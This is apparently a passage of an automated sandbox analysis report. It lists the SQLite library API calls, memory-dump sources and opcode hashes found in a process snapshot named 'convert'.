                                                                                                  • Instruction ID: 6ac0993a4910acfd752c1271c193818a4eef371ac2cacdf2036077b75b948d8b
                                                                                                  • Opcode Fuzzy Hash: 836ed8021e88d929f635eadc4386c06fcf42673ea3f0fc6bab26bbdca49803ff
                                                                                                  • Instruction Fuzzy Hash: E2512A74D04359CFEB10CFA8C894B9EBBF1BF45318F1085A9D448AB281D7759A84CF52
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E21AB7
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_value_dup.SQLITE3 ref: 61E21B0A
                                                                                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E21B3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_initializesqlite3_mallocsqlite3_result_error_nomemsqlite3_value_dup
                                                                                                  • String ID:
                                                                                                  • API String ID: 405757302-0
                                                                                                  • Opcode ID: 23f32d968876495cc2466569d6e3a70bbd3d708e3568469acff148bc67b735ee
                                                                                                  • Instruction ID: e843903b77586eca95070302ed3968e175ede67b53b8a1002c3728e5b8302022
                                                                                                  • Opcode Fuzzy Hash: 23f32d968876495cc2466569d6e3a70bbd3d708e3568469acff148bc67b735ee
                                                                                                  • Instruction Fuzzy Hash: 26311B75A04219CFCB00DFA9C4C199EBBF1FF88314F15856AE848AB311E735E992CB90
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E3C1C9
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E3C1E9
                                                                                                  • sqlite3_vfs_find.SQLITE3 ref: 61E3C228
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E3C327
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                  • String ID:
                                                                                                  • API String ID: 321126751-0
                                                                                                  • Opcode ID: c7fb295c7c4fafc45fc31961be73fcc8f43c58e2ca488124634f316559f0ba0a
                                                                                                  • Instruction ID: 22c0f88c5b06d876445ec190bf5dde36953c23e2b57f9d2c0a2a01f592960467
                                                                                                  • Opcode Fuzzy Hash: c7fb295c7c4fafc45fc31961be73fcc8f43c58e2ca488124634f316559f0ba0a
                                                                                                  • Instruction Fuzzy Hash: 9E417E3495E7F88EC7129B7885807D97FB1DBD6B08F1884D9C4C887352C236C5A9CB61
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                  • String ID:
                                                                                                  • API String ID: 3596987688-0
                                                                                                  • Opcode ID: cb68b6a65082d018b6cfcb4ca6be36277b7b3163969adda79eea7602827c0f4b
                                                                                                  • Instruction ID: a5d0ba820aa02c776048322127c14ad84011fd730f87f6df5ddd70e6a7576ed0
                                                                                                  • Opcode Fuzzy Hash: cb68b6a65082d018b6cfcb4ca6be36277b7b3163969adda79eea7602827c0f4b
                                                                                                  • Instruction Fuzzy Hash: 2E31D5B19047059FC740DF69C89169EBBF4BF88364F24C92DE4A8D7390D734D8518B91
                                                                                                  APIs
                                                                                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E24DD3
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E24E6B
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E24E8B
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E24E93
                                                                                                    • Part of subcall function 61E11F58: sqlite3_free.SQLITE3 ref: 61E11FFE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082161338-0
                                                                                                  • Opcode ID: 9cc4633a097e73c785436aae75047dee1b6240351f367b22dd09a06025fac2d8
                                                                                                  • Instruction ID: 4f5da2dd7615b2eb881f19983d549a637049a25a588ff212f0f7a96383ee719e
                                                                                                  • Opcode Fuzzy Hash: 9cc4633a097e73c785436aae75047dee1b6240351f367b22dd09a06025fac2d8
                                                                                                  • Instruction Fuzzy Hash: 7B31B2B09083469FD700AFA9D85875EBBF4BF89748F20C81EE4989B344D778C5458F92
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E19BAD
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E19BF5
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E19C1C
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E19C4A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E13921
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E13978
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E13995
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E13A3D), ref: 61E139BC
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E398E0
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E39908
                                                                                                  • sqlite3_mprintf.SQLITE3 ref: 61E39919
                                                                                                    • Part of subcall function 61E37BD6: sqlite3_initialize.SQLITE3 ref: 61E37BDC
                                                                                                    • Part of subcall function 61E37BD6: sqlite3_vmprintf.SQLITE3 ref: 61E37BF6
                                                                                                  • sqlite3_create_function_v2.SQLITE3 ref: 61E3995E
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E8F2DD
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E8F2F7
                                                                                                  • sqlite3_realloc64.SQLITE3 ref: 61E8F32C
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E8F354
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                                  • String ID:
                                                                                                  • API String ID: 1177761455-0
                                                                                                  • Opcode ID: b47c86a4b05f7ac8acbff865afd01882df6996ccb508a56b7435c181797bcf22
                                                                                                  • Instruction ID: e04bdb1e155c4d8aa20e61285c6a2888ab4b05c20be94f1552d7127dcdf8dc43
                                                                                                  • Opcode Fuzzy Hash: b47c86a4b05f7ac8acbff865afd01882df6996ccb508a56b7435c181797bcf22
                                                                                                  • Instruction Fuzzy Hash: CC019A706487028BDB00AFA9D58061ABBE4EBCA358F28847DD94CCB310F339D891C791
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __dllonexit_lock_onexit_unlock
                                                                                                  • String ID:
                                                                                                  • API String ID: 209411981-0
                                                                                                  • Opcode ID: 07742367f55d61d53813d7123b5886db0ccbcf0ca65f58ae6c5a9ed79f5283f3
                                                                                                  • Instruction ID: ce0efef4826bfe76aae18edee85d05d8edda80e93cf8ddb27c6369d96a1df9a0
                                                                                                  • Opcode Fuzzy Hash: 07742367f55d61d53813d7123b5886db0ccbcf0ca65f58ae6c5a9ed79f5283f3
                                                                                                  • Instruction Fuzzy Hash: E1117FB59197428FCB41EFB8C48851EBBE4AB89364F618D2EE8D4C7350E734D4848F82
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3222608360-0
                                                                                                  APIs
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C664
                                                                                                    • Part of subcall function 61E0A4AC: sqlite3_free.SQLITE3 ref: 61E0A4CD
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C677
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C659
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C6A5
                                                                                                    • Part of subcall function 61E0A643: sqlite3_free.SQLITE3 ref: 61E0A654
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                  • String ID:
                                                                                                  • API String ID: 3930042888-0
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E204E7
                                                                                                  • sqlite3_result_error.SQLITE3 ref: 61E20517
                                                                                                  • sqlite3_result_double.SQLITE3 ref: 61E2052D
                                                                                                  • sqlite3_result_int64.SQLITE3 ref: 61E20545
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                  • String ID:
                                                                                                  • API String ID: 3779139978-0
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E18B8F
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E18BA7
                                                                                                  • strcmp.MSVCRT ref: 61E18BC4
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E18BD5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933023327-0
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E8F36A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E8F382
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E8F38F
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E8F3AB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 3512769177-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strlike
                                                                                                  • String ID: \$m
                                                                                                  • API String ID: 933858916-1477243525
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strnicmp
                                                                                                  • String ID: '$null
                                                                                                  • API String ID: 1961171630-2611297978
                                                                                                  APIs
                                                                                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E28B1F
                                                                                                    • Part of subcall function 61E1819C: InterlockedCompareExchange.KERNEL32 ref: 61E181BC
                                                                                                    • Part of subcall function 61E1819C: InterlockedCompareExchange.KERNEL32 ref: 61E18203
                                                                                                    • Part of subcall function 61E1819C: InterlockedCompareExchange.KERNEL32 ref: 61E18223
                                                                                                    • Part of subcall function 61E18126: sqlite3_win32_sleep.SQLITE3 ref: 61E1817E
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E28BEA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                  • String ID: winDelete
                                                                                                  • API String ID: 3336177498-3936022152
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$ProtectQuery
                                                                                                  • String ID: @
                                                                                                  • API String ID: 1027372294-2766056989
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E132EE
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E13363
                                                                                                    • Part of subcall function 61E13056: sqlite3_mutex_try.SQLITE3(?,?,?,61E130D6), ref: 61E12FF6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
                                                                                                  • String ID: #
                                                                                                  • API String ID: 2389339727-1885708031
                                                                                                  APIs
                                                                                                  • sqlite3_stricmp.SQLITE3(00000000,?,?,61E6200B), ref: 61E03AF0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_stricmp
                                                                                                  • String ID: sqlite_master$sqlite_temp_master
                                                                                                  • API String ID: 912767213-3047539776
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1FDEA
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E1FDF6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                  • String ID:
                                                                                                  • API String ID: 3265351223-3916222277
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1FD78
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E1FD84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                  • String ID:
                                                                                                  • API String ID: 3265351223-3916222277
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.KERNEL32 ref: 61E180C2
                                                                                                  • sqlite3_win32_sleep.SQLITE3 ref: 61E180E9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalInitializeSectionsqlite3_win32_sleep
                                                                                                  • String ID: Pza
                                                                                                  • API String ID: 3721583994-636368962
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E37132
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_str_vappendf.SQLITE3 ref: 61E3717D
                                                                                                    • Part of subcall function 61E23995: sqlite3_str_append.SQLITE3 ref: 61E23A0E
                                                                                                    • Part of subcall function 61E23995: sqlite3_str_append.SQLITE3 ref: 61E23A45
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_str_append$sqlite3_configsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_str_vappendf
                                                                                                  • String ID: F
                                                                                                  • API String ID: 4014417345-1304234792